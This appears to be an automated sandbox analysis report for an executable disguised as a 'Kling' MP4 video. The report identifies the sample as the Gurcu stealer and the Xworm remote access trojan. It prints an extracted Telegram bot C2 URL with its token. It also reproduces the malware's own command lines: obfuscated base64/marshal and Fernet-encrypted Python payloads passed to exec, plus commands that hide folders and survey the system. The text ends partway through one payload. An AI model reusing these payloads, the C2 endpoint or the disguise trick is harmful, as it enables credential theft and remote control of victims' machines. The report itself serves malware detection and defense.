Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2024 02:47

General

  • Target

    Kling_CompletedVideo.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe

  • Size

    53.5MB

  • MD5

    3d48cdbd6d323a25303ec7c6e6c31176

  • SHA1

    044a8d324faf96eaaca3a8323bcb1eb75ecca1d8

  • SHA256

    96ff951df16221de54c394c38869aa77e6e7424669521ce5aaabee379b6f96f1

  • SHA512

    b64d6714530d342c7f615261062f8e60a6d472651878de2748edef862f1811d32b919a0252013e1cd8cea45b68fa9aa6f5f6ccf39298a80efa8fdf0829522f61

  • SSDEEP

    786432:rnkl+yqXRVMeIrKNdd8T7lEwR0A9z2x4HdIooSaEOUcaLAC1tVCCxQTl8vUOwZgN:I+LXRVCe8TUqHdXoSB5ACt5xQ5wk

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7276041743:AAHcuQBIgMQxThnw-SMW4PSn0GYAkSjroxA/sendMessage?chat_id=-1002395802128

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Kling_CompletedVideo.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe
    "C:\Users\Admin\AppData\Local\Temp\Kling_CompletedVideo.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3464
    • C:\Windows\system32\cmd.exe
      "cmd" /C start C:\Users\Admin\AppData\Roaming\completetedv.mp4
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3100
      • C:\Program Files\VideoLAN\VLC\vlc.exe
        "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\completetedv.mp4"
        3⤵
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:2024
    • C:\explorerwi\explorer.exe
      "C:\explorerwi\explorer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3752
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAUAAAAAAAAA83AAAACXAAkAbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AQkAZAdkAWUAZAJkA2YEZASEBVoBbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AWUCWgNlBFoFZQRaBmUCWgdkBVoCZAZaBGQAWghkA1MAKQhU2gFf2gZyZXR1cm5OYwQAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAGQAUwApAU6pACkE2gJfX3IBAAAA2gNzdGXaAmFscwQAAAAgICAg2gZ1cm5hbWXaA19fX3IJAAAABwAAAHMGAAAAgACAAIAA8wAAAADpAQAAAOkCAAAAKQJUVCkJ2gNzdHJyCQAAANoFcHJpbnTaCmJhY2tfcHJpbnTaBGV4ZWPaCWJhY2tfZXhlY9oETVhFTNoFTVBHS0TaBXN0YWdlcgQAAAByCgAAAHIIAAAA+gg8bW9kdWxlPnIVAAAAAQAAAHODAAAA8AMBAQHgBAjgBQn48AMAAQyAdIB0+Pj44AgM+IgEiASIBIgE8AIDAQ3YBDvQBDuQM9AEO7Ak0AQ70AQ70AQ70AQ70AQ7+NgAC4B0gHT4+PjYCAz4iASIBIgEiATgDRKACtgMEIAJ2AcLgATYCA2ABdgICYAF2AcIgATYCAyABYAFgAVzJAAAAIIBCwCDAgcDhQULAIsCDQORCRsAmgEjAJsCHwOdBSMAowIlAw==')));MXEL(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAcAAAAAAAAA87QAAACXAGUAZABrAgAAAAByCgIAZQGmAAAAqwAAAAAAAAAAAAEAZAFkAmwCWgJkAWQCbANaA2QDZQRkBGUEZgRkBYQEWgVlBloHZQhaCQIAZQVkBmQHpgIAAKsCAAAAAAAAAABaCgIAZQsCAGUDagwAAAAAAAAAAAIAZQJqDQAAAAAAAAAAZQqmAQAAqwEAAAAAAAAAAKYBAACrAQAAAAAAAAAApgEAAKsBAAAAAAAAAAABAGQCUwApCEbpAAAAAE7aA2tledoLZGF0YV9iYXNlNjRjAgAAAAAAAAAAAAAABgAAAAMAAADz9AAAAIcFlwB0AQAAAAAAAAAAAABqAQAAAAAAAAAAfAGmAQAAqwEAAAAAAAAAAH0CfACgAgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAACKBXQHAAAAAAAAAAAAAIgFZgFkAYQIdAkAAAAAAAAAAAAAfAKmAQAAqwEAAAAAAAAAAEQApgAAAKsAAAAAAAAAAACmAQAAqwEAAAAAAAAAAH0DdAEAAAAAAAAAAAAAagUAAAAAAAAAAHwDpgEAAKsBAAAAAAAAAACgBgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAAB9BHwEUwApAk5jAQAAAAAAAAAAAAAACAAAABMAAADzTAAAAJUBlwBnAHwAXSBcAgAAfQF9AnwCiQN8AXQBAAAAAAAAAAAAAIkDpgEAAKsBAAAAAAAAAAB6BgAAGQAAAAAAAAAAAHoMAACRAowhUwCpACkB2gNsZW4pBNoCLjDaAWnaAWLaCWtleV9ieXRlc3MEAAAAICAggNoGdXJuYW1l+go8bGlzdGNvbXA+ehh4b3JfLjxsb2NhbHM+LjxsaXN0Y29tcD4IAAAAczIAAAD4gADQF1bQF1bQF1a5ZLhhwBGYAZhJoGGtI6hpqS6sLtEmONQcOdEYOdAXVtAXVtAXVvMAAAAAKQfaBmJhc2U2NNoJYjY0ZGVjb2Rl2gZlbmNvZGXaBWJ5dGVz2gllbnVtZXJhdGXaCWI2NGVuY29kZdoGZGVjb2RlKQZyAgAAAHIDAAAA2gRkYXRh2gp4b3JfcmVzdWx02g1yZXN1bHRfYmFzZTY0cgsAAABzBgAAACAgICAgQHIMAAAA2gR4b3JfchkAAAAFAAAAc2sAAAD4gADdCxHUCxuYS9ELKNQLKIBE2BATlwqSCpEMlAyASd0RFtAXVtAXVtAXVtAXVsVp0FBUwW/Eb9AXVtEXVtQXVtERV9QRV4BK3RQa1BQkoFrRFDDUFDDXFDfSFDfRFDnUFDmATdgLGNAEGHIOAAAAegkxMjcuMC4wLjFhHAQAAFVqSTNMakF1TUM0eE1USTNMall1TUM0eE1USTMzVlF1TUM2bU1WWTNTakZDTUhReE16SlNMMVFzbGk4eE1aazJMakF1TUM0eE1USnpMbTB4YWl3ek1WYzBMREJMTUVRMU1USTNMakF1TUM1Vk1wUTJMakNGTVM0eE1USTNMakF1bGk4eE1aazJMakF1TUM0eE1USTJMbFFzYWl0Vk5XZzBvaEJLTVgweEdEZmVMakF1TUdEWU1ESTNMbEdTTVM0eFVHVUdXVklkZWg1NGVYaGJUV2g0WEUwQ1kwaDBRMnBYVWh3QlZtc0VaQVZOZUh4SGF3RjlSbE5wV0J0OVhHaGJUVjBiWEVweWMwSlZkbkpZVTBCZ1ZtQmFlRWxNWFhnQmNseFRRVkY1U0VKNGQyQk9TbWQ3Qm0xWWNGVitiWEllVTBCYUIzRmViMWRuYzI5V2VIRjJTV3BwWmtSU1gxNUFTbmhqVjM1aWMwdHRkbllmYW5aL0FWRk9HMTUwYUg5ZWVGOWZIbFJtY2xSK1dBcEJUVjFvQTJKY1ZVSlRhVmdmYVVCblMyaHZaRnBNQWhzQmEyVUNIbnhEZmxoVFlnc0RkMTBYQUV4bWQwZDRlbHNiZjMwSVJWQmtGMGwwWjNSTGZRQmZRbWw1WWxSOUF3TmZUMmNhUmtwNWQwVmtIRWRiVkdaWkFYdGVSVVZLZDNnRlZYTllTWGx0Y1VsNGNuTlFaM2Q0QkhSbWZGMWxRMlpYVWtObkFYbHdaMTVoZFVrQVVtcDVHbEY1ZW54b1pnSk9UUUZvZDBwNVdrVmxlR29ZYVhockJXWmlYbWQ2WldkR1UyVkRXR1JFZWtocmRGa0NlbDUwVVg5bEFWeDhmUVZGYW5sL1NGZHZiQUJsZDN4ZGFBRjlHMU5tWWxSNllsbDhaM052VjJkeWNGVitiWEpIVTBObldWTkFRVmRuYzI5V2EycGZSR3AyY2g1NGRHUURkd0o0UjBwMlhVUlZSM0pHVTFkelhYMVFRVmRuYzI5V2VIRjJTWGxtY2taU0FuOEt4ekl1TUM0WU4rZ3hURkZkVlJnRjZ6ZEZUMTVKVmZRd1dPZ3pTMGhMVS9RNFV3UURTbFZOWDBwVTZ6ZEhYRmxBUkljeHdqSTNMakQwTmx0RFgxTmFTOG9tREVOZVZVZGJTdzVjUFM0eE1UTTNMakJkWEM0eE1jSTBMekV2NkM0OHNUKzNJN0FqNkNjL3VTZS9YN2sydkRiQk1URTJJOEF1TXk4OHNYUHZLaml1ZFA0NEtMb2gramszd0M0eEttc3czekF1T25RMnhUSTNKR29wd1M0eE5Ha3cyakF1TlhVMndUSTNLMnNwNkNJOHNYZnZKVHl1ZEs1MXdUVTBMejNlTUMwd1BFQThMakF1KQ7aBXN0YWdl2gRleGl0cg8AAADaB21hcnNoYWzaA3N0cnIZAAAA2gpiYWNrX3ByaW502gVwcmludNoJYmFja19leGVj2gRleGVj2g5kZWNyeXB0ZWRfZGF0YdoETVhFTNoFbG9hZHNyEAAAAHIGAAAAcg4AAAByDAAAAPoIPG1vZHVsZT5yJQAAAAEAAABzrQAAAPADAQEB2AMIiEWCPvAAAQEL2AQIgESBRoRGgEbgABbQABbQABbQABbQABbQABbQABbQABbwAgUBGYhj8AAFARmgA/AABQEZ8AAFARnwAAUBGfAABQEZ8A4ACROABdgHEIAE2BEVkBSQa/AAACRCEfEAABJDEfQAABJDEYAO2AAEgASAXYBXhF3QEyOQNtQTI6BO0RMz1BMz0QU01AU00QA11AA10AA10AA10AA1cg4AAAA=')))
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\SysWOW64\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
            5⤵
            • System Location Discovery: System Language Discovery
            PID:916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4000
          • C:\Windows\SysWOW64\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4804
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4920
          • C:\Windows\SysWOW64\tasklist.exe
            TASKLIST /FI "STATUS eq RUNNING"
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2320
          • C:\Windows\SysWOW64\find.exe
            find /V "Image Name"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3404
          • C:\Windows\SysWOW64\find.exe
            find /V "="
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2312
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic csproduct get uuid
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1152
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'uxyI_CawdzHc_-f0v31N6RdOhmPceWptkt9gJaHBwxU=').decrypt(b'gAAAAABmYRtbE3kDvZg300aepsUWvtGVCRp0y_uGbRqGwdV1rlvJgSyPO-cADNrX4D_nLAnBKx9sHQEeWCYlaPN6iFFWNUj-Wgs8h8a5ewhP6uv7LS4u0mQVfQsyuoFpfDwz-BfP6sxHi2gsB2pvT-RZvanf8HcC7KVJiTEyxaqOPycTWakVWSw91xNWMZWkfBbZL831y3yBxR3V51HSG3h1AyCW9osw4FsvH6bZvK1poaui_Z8lwp3c7wkZc7P6gnUKjXwo5jly-5GBet3847b4ZDtmTKJ9gP0MCh-rwtKPOL6hKK0_UE6iwhm4rq0DZogahI2CovjSaMY7GuQ5F17hE0Tc7UUxD84bjf0cdhQ5Dlmo41ETza572Ug7b1-ENxv5EDJeBnahwvQCnFqXIFB2pzvAQDzQ9jAEvY2KFm-cLdfvz7e5hSlcngS1acKMX5kUDC6rPSS1NFeRws9f165HswMC0xcbRL_hq60l19lMI4MSc4r4b7ugweDdnj376DQRKZeK3G35T3OpK06IN7Wm9M902osxL8z0BZaBf0ZoeMueTgHOAwWzqybauZZgMyBAY-0eFaj1PAmqZQMx9oanq6ygJeX3ogifwcxIo0wUTIWYPEEO8B7TjAsf6P_-YeEjr6GHNTyMwY3sgUuJvXfimaPKE02Ar0uA2kfYMTVMSSKmS__1SNrPq23VILw5tW0SfZQXtVwG0mhBx7yjb_6H6O8gY8fkpw8KGtbvt3vBiT7h5JCxQwFdB15FejxobU8YYH6MJJSq-kV1iJy_9TeVC3hLZE0Bu4zs-n83hXqoIqXHKHaxxTk-0cmxA6QgwDC8XXUQVeLEaIH0Y9K7Wq50lYntqZCObq_PuYW5a70qXo2wuzwYqzO8ZGRkHhp0nbu6U4HGyVmfbXgS9BTEJssrk0K-9GwtcdQMPkrxz3BJ6lyHsK5aT1534trR3gPzSQHNOjn_ie9TpDQcNNj8IAUFr53_PVGHqbLc3p1hPU7RDXWseYytjAAXjaR7dbod5Nxk6GCDlGvDxYq96j3n2mwwpUWzdIGklGMnCeIwOMrB5ht6Hr25qis6BWVObfXLNsaRBYqdaViYCL0ccs8pKbfLDH0s5S81hGPYY16ub4ysdVp7nBqZhTkKJR785IuQeZJYicir4edc3EDDfMKFJkAtoy5yS0vrOEy1hH6LL3aw3wrsPC5Xsc5YhtEyRulOfAjxtRBEhSpLr-ekgj0DZz16pFZ21LRJw2_EO0Unf4a2_inh99jQPuHBPlw6TVKSn15ncPG4q1CdWBWWdDMtDvTN54unD5iP6DBvGQqPwOGJ5bxyevbPF9QQSamGQRwaD2I-TYgj3A_9sZ60CiyclM6dVOcnpwL8lVLQxwR_3M3LlSvDwFk4G4JTGD6glQJo-Yk7Ji-cu7cpg6vepC1OVvZzWn-rPHa5Jt5isLSgYM8Gltc6TaQK_LZrstI04HO8g_Jt--TCBDDVopoCTnBXoPX7lPoxvyR2BX4SMixQcGpthGtb6KpIimpjvdyENFetnBR-I-duatYHNDaqbjPYdTaOAoRLePo1pk0cDuS1UuCX9Gtl9zAtnwKk4osngMaXaSNsTXGHSbHDnxGKAUPVfv-lIciN9Oc_jy6zJLm1GgeBMFhRbpK_cGDwiZJ-XgzVngR25vDDzaN5zfxaCOYLI3ZKoJPX5DO-E01d39eHx8E7XlJggvEtIPG2OznbnrcXZJEKzBPo7B_U3FxRQQMttw1aLb91bqOp-ktoIC_WERDWpqqQLD1WH9UO81IoBlcqx9ywZq97JFEG-nAVo61U7Tx9oS6xYlvggPhF0gZ56B1nfHfccrHXB5rz3HNxG2xIR4E7S6bgxYZN2kiVQrVwO1QO5uRtHt9EJeTIBoDCN4pFug2jn4EgSRYlumk7bfm6lj0sFjrMbHMvWUEIcPkItJGQuYts9RlnO8Vvx6_lOAsS24pgiXSEka37B_xbT_YmN10G2mP1ds8TCS5JRRlTDAoj8WP0BmbCGJjWo5wS3-9qf3dggtvaXTQnlinUSwthgwDDik93goLmj9A3k2uGGp2VHkIHuF8952EUGOPoYRul9zx-xgVDPYC72juQmq6-JvIvuIV49oHIe-uH7nZvejMcE5y2pPTTwnvh0ieapSJS0HO1hiLOnxN-y8eTsZSHevJJQX2vM6FI-ZEeBPjU6NuyXmxmJmbNLk5fIuhFYZMfDAFhfp70amN0LToIxWkCgp0B8Rlb6JjbKlwP1gjJoPz83swcjvOBLIhZXxWrWMTr71yPWPcZKz3Sg8Sq6odULwkFfxQzP9es9OqiA2pt_tL1C4ThGh_mLGGXUHfUvlz59bdTYXhq75ZHmFjAiZsXvHSgOYnM4PfYgn_qANlPldkp0SCKX9PZr27_1-Gr1Y7ERTB3ft0Xr9noNBmJ1H_ku0Fy95Dx6-OkG97HocgKmrFZ-8uswkWXd2hB6OPd3_RIO4tZf_MBvLE95Sar9Cmb9e3aDl7AEiiJWK412D0ZZ4rBhIxwJbT1qJJEMxsmk4l2rt5dVkP4j7n1zL-UH65fvpAt8ai4q_6Uy7fjpAJKH5Yy1Tb6gFPSP3njmsMg_v-FzxsViE3A2gVKlcOaESYsIg8c7PkUBbQ2dgEGVLYvufhGkpmEhVAI4a5hwGfW2wAMWhUfCYtFRwIhC57Ah6qUy4v7OHtQvhqhoNiIlDi0o3D5uJc8VPq5ZsCaxeGrB_aMS9ZwfOS5iwzRrHbAgGeA2WWjJVR-U28LjpDne3LzOX3MxVt9zBsTdy1z86W8MFTOTT4Zurg5e9hwx47aZFxBnqcnYeMhpJS0qY7JWhF5ZMG406uRe6Ix_cRiSkMYBlo9UvYw9wZjU2Ed6l4IYHYtQU6ZlNE-6-a35xLNO8j9uEGinCN3C2xRO_WJfKx-hxHEwwj9hE6JWPG5lMVm5XjrlP5Aqm2QS6Js8cwcuad8SkSs0U7vVpwoVCofg8HVAmsmHGN2042c5_qCv5axihRSHeMnFeowq98EiceHg6vi_rCLiPBbJemL9aciTGxn-f6AjUDzmRLWbklzoLzcXpa22hRGeLdGupSCnlPBPb37GId_qigIB1uuHWMXp70nmn6XN9ek-OOtDWPQCNOJhTc2QE6nYC-FL4FM2MKpN2_ZhEW9Tg3KeNXKKRK5JdX0G1dOiroZMv29SWDpoE_8o9u4wb2gvNKJvso8bSxTmMBavUaZYkG5TcXIZ6WbA3J8lnomMgdMl0YkKzVd6wwXPKSMgsZTYlOx16hDnqsQma91WchBOSVe_kAcSfHShUGPt23mDQQoZ2zjn9z0fUW69GWxh98pSszX-Xlwcp3iqTXi0xU4DlaG3OTQBlvMHqiDVgl0WdM-reYy-bzmIJNQxA3gBISQo2SchyAfrB86AljoNaWZWBFCE95cpCqlRrB_QFE5jrk8hMnKLrlxzRcrKT9l53CPOn-dFhLvAx4Pdq31_ZXAo1DXgEP4Rljr3oDsKmltxXbV0ay05kA3-h4RE8fwiVyzmGbdsmHNCX9Fvg0w8VhMeAJbZyDtA847MVZfUsA40o0wD8ZQuehaLEzbb8lxTQVM-H4QBOWUR19gl5Xh_3D8TNbEpbVXR3BlOYHprCczqHA6jaSELPHhQ99UT8ChjhpjRtBpKczsng3X_Gr8lHUFQoxrd6O8THKlS3Op2rPE17YvrD2A8wtgqHyoFBThPnv8c7wwN-kj7xIkbBn70J9IX_IZT2ZUjF17W8n6bC1QdgoL8cNTsM9hGAyBnN3DGwcwb8fnIyHGNRezsT40hwE5ZJDdo6ekjuCX_ZTmB-zw1ApZu-cxnwKaGHXF0GhxaQiNhiUbyT9Fyv5q1ZbPRaHG5n7GM_SxonUsMCjvFTPI1G0xS1qThy1d8O0biQQT_uASBsaToRJeltFX3Yr6CJn3R7e6SvPVp_ghxyDGRz3sIi9rOn9SJZknOPkyicX43RNUGSb45NHFzozaaXy1_5Je9Kw4JKHB1hOMFZyZHCZSDqZc3GUgs4DdL3vA6lzDp-Oz_A8lSDM1qvm8T-xjceaRuW5DzPlQAc_1msKyIsp0DViuquFvFj72Dc2iP1L5S6MqTqHCcUOik0y0Izgn3KTPYNhlNZ9ukR2G4hZeFtdg5FXJOVqmYbgwjk5jwYQt1sog8OCg6fwc2AagkzK7bPCxDzQVEGdmSXQZHj-GNxzts1pL6MEMzRyCesDoencuFQmqBuyfpYfrlcyc087sq--51JoCq6dY46OGizociFRYyDq08jo-hua5AQaohnvB4fQXJHs06fr2xNBJf-FHlA9dSr8ueCAS4rl8GYecXC3QOWcXrw-F1FPzcSlFzu2-wMxBBVB0_ZrVUs3b4zDR_F3wfDNsUqSxDNrdBBFqUoPLXf3t8dVNwoK24y-b5t_vFgJlvqybkwkxItkxBVEezJx-OoiQFe7H9G4WNY_6e1r9YY80WdJX15hDLOsyZj2qK1EvktsQ6aYExJDDdjL5CjtUTLtDx0_v-NEJY4sNX__hCPED7Je_Md3raLXPQVBT-Q2QYUhFjYPE6UlRl2N9YQlhqKVxg_uTaRpdA2IUkJGMhoDb0gtr7dYqb-k2NbTsznSZZ5ID1yQNGK_EMFqryrHE3KfqiNtWZ2dNI-1tyGQWkJwh--IExKtbrYVBS37CjcT5giNzxtGfEU7jwEiT8dDuKjCighg6e9HeD3KpuQkilUOZcbKtLb7FfRE32AROeGoDsf09GeqSzf0qBI_q6uoIQjTq1YUU8pGymb2dgri2fZm-waKiVEzcacPu0fcokPWcGtJnqc7TAo6blFDEnFNiVTAalti4qOxGjphyiLNdctcEYBIO4oIIviv_OTXZLiAGyYvTXsKG7htqY3l_pmoljt2Am2KlM7knnrO6Wyvyj7gRUK4x8JlVbLEVCDy00ScV7mFVe9e7BXOjYT8KZuIjakeBn0-JEJwZ_ushgn7DnCBAvaf2iiX73v1c_JNZtidLFbx2LYi3zfMRWUkliDEeerq5pIPLBumUM0fo6ybIibgJYLIUPgQmBweNQEt88XI6zYUh80McnHc4NlUvwVxzNyQFVPcNootchy5ugv7h6O1LF7Y-oSLljbd8iO3T9fiZrSsBsrH82rvAi4Sulmgq33l4aAJ3daR8gAK2T1Md-nB8VO6xPXHljJ6Rdtkj5o2qVTiK27zO_0X4mXHfYHDz6i76Ga-X9GaXlh1w7QGHDkqlmqvqqztp4qB5d5YbSVcB_13onOPCE-AKIkvGiEbuKLMXYE6rJYxqTrTV4IndJ7qBMnhGwkUSQhEQDciTRUTYpsMGDDaGoHi3Y6I96KhOEkGG-UpryaHIYeLp6KVZJhNglaisDWJaiRIhBAojrX2FAjIsbNAHcU_zBm-3OiwPyuXAuu6ZDXp4us63voBJyGNu1u_3ywhumueM98fdkRsnYKJn-P_eGAs5IOe3BBw8iMFwBHimeoEJo14Dc5cCkl3cPVWzlWztH3nWIxXLvbPO9MtNSxwFqF0m_D08iIb5SwFU9Yk5a43DyP5xboFYXz-viRCXvi_nVvsDNWrRMEx0EZ45JqHNDXErfpqEQyR_HHsVodlt08Zv4yTpP0j7eaL280gnT8NMAUMAEiogNCOFmJZ2qiqxQS_Tc3TF98_E3cibQv42rPSybJ4UFEByK1IjyFzZzCylW4-1kCvztFDuSvR6bMm6cxubmVoU9wWDscYeYzl7lTX6ByNi_QT6eUoVgySm4b_qsY4TSiPQlYOQi1kBn-XGLuq9KpCPW8Q90vfvkZKKwB-GLzR4VBU7PvZr_m5XQcSdUyJGclMvmfm1VBVvEevFTwYZ7JmgTj15Hp1-2B0HMgRpDnEnbn0NeUkG2bwcdF8uPqFyhxj3nxlu5Yzk2EWYOFdQraEyg98xZz52cBU6YFmYg9osLQ1--T_jmkdPMNAJUAnorB-MxRtBqPsoMlZ4DIcIaXuWrJxsb9i3xpCQdFuPjsvjAMLsxKCQybzTa6Z34SzFrRVB17kQgp8rXVkViWtUhQT7O7fefR_6TSoCIk17vYo-y-vk-Fm-nJja2uHH7nGLLsXa7VAWYuMyIIOdTKAPKaT_B9f_VtZgSXd93WWR-zp-jSvtzctghYQq8IKnBqnGFNIiG9Kee968mzvg5P-l7oVn1XmaPRlU9RpITwAR7yFwlYqv4MN6fKQqaxWNvvVPMMPx0z3sJws5mUL5dm7qM5Bs0Ny1bAR33kghRMXei3O6vRq0TuGp0u_vnSZheAHquLKQYqpPlPsxp3XLPohT1fjPK2lladaaKRTnL2WjXjd0uSzWh0mSx_gfbU0Xi-_gUS7cRQ8juuK7dccjxQwIp0Va9VguyhVz1e8x1vBvDN_y19a1daAEXNOAbOaCB2YdKRL66_gcMDS4ZvpROGpW6Yyn1HMrkVT3ZKro5w=='))"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Network Service Discovery
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:920
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwin""
          4⤵
          • Hide Artifacts: Hidden Files and Directories
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s "C:/explorerwin"
            5⤵
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:4324
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'ViriKlkg22n1ztfawqmpxUymLAlW_I5_g41x7FLJOnE=').decrypt(b'gAAAAABmYRmUseFMTSHeK75BTYjbbQl6P1slqj7DOSLUylY2GuS_G-aTGYEifUWIZQbkQYXXkIaTrHx0f0yJVkwhYXcqFNDluYYMBaXOfLaErV3zkW1mpfILNvIFPZIvTfViKKv0MqvL3kCKWlKLKGdGR370BwJMaiXIKfqPBkaO-c0YgsX2Ot0c5Q-Wn6PPsxE4Ih7WE7N2smYKjVKMKXuepZqL2PDxcFGSCtutZbui-8ebhnJv4eFSowEEhZApoWLZR1TRrUwlCkVnXzK0FvcgaO-LNjc0mzbHfcs97-QYTJVVB90sr8jo3LhvSbqfhwnehJD-dzmaD1YGjgpKbZsjcgdHb3EBytjAPWlOD6S212KxlS4OThk1Q7L7WvIQHM1ctdEZWQq89ktF9gug0vhoTfYgV8bY_nu2OGFxrVkAyHhYH6GUco-LABj68EVnjtAZyQdVxYi0wMRj35rnV6l5_tqQLbbelhEfIUyd6fT5caPsvDo_8g_Wh8qVT7dH2Nu2U858GMIA2x5RL8S_Zu7v6AL5rSk62lv5CmRTff4LMzMvWhJqIUnmyZBIdw2pZKhhaIev6azan5mEDIzxGBVmw5AZ7uYtaqKTLfZIQeOY0sqUrKNPtewy-dM1TrDq5eL46bfj9OKIS4RSXaaLYXlEPMvt52fgCUzXGMbLAXKa1LbcQjo9dWejBpLZ7LgwvNPEeuvWssRgGnzeBJXU6qRy7gIIZuqJaMSwfp4JOK4k1QJXt6DUOxvf_xFR-w90OSQ7pgpRZxOqmvXccImyhfISz2xeW5Lir7v7qaSsZXUuN-QH-d8A0XePAmvUHnwDkDJB6wEaMMD5yv5j9BwTo0oj4IjFzo1QpxoAdhF0iPmWwOFquyghgb5KsOyYOViTMM__mA-Pjg_z12UnsxyvpkWnuT640UF8ht4Yak5JcKIOKdcBZCux70sW0K4jKDOF4dgicGAExRWWODybG_saRcvQXInCsInsyr7Bt2JcwkmsaxS9sWe9m9-spt9EySs6BOX2iX9KZ45CGrh0yzLlzbMhK